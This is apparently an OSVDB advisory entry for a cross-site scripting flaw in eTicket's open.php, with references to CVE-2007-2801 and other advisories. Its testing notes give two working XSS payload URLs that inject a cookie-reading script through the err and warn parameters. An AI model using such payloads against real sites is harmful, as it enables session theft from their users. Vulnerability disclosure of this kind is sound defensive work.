eTicket open.php Multiple Variable XSS

ID OSVDB:34786
Type osvdb
Reporter OSVDB
Modified 2007-06-27T00:00:00


Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[PRODUCT FOLDER]/open.php?err=<script>alert(document.cookie)</script> http://[target]/[PRODUCT FOLDER]/open.php?warn=<script>alert(document.cookie)</script>


Vendor URL: Secunia Advisory ID:25871 Other Advisory URL: Mail List Post: Mail List Post: Keyword: netVigilance Security Advisory #31 ISS X-Force ID: 35121 FrSIRT Advisory: ADV-2007-2372 CVE-2007-2801 Bugtraq ID: 24681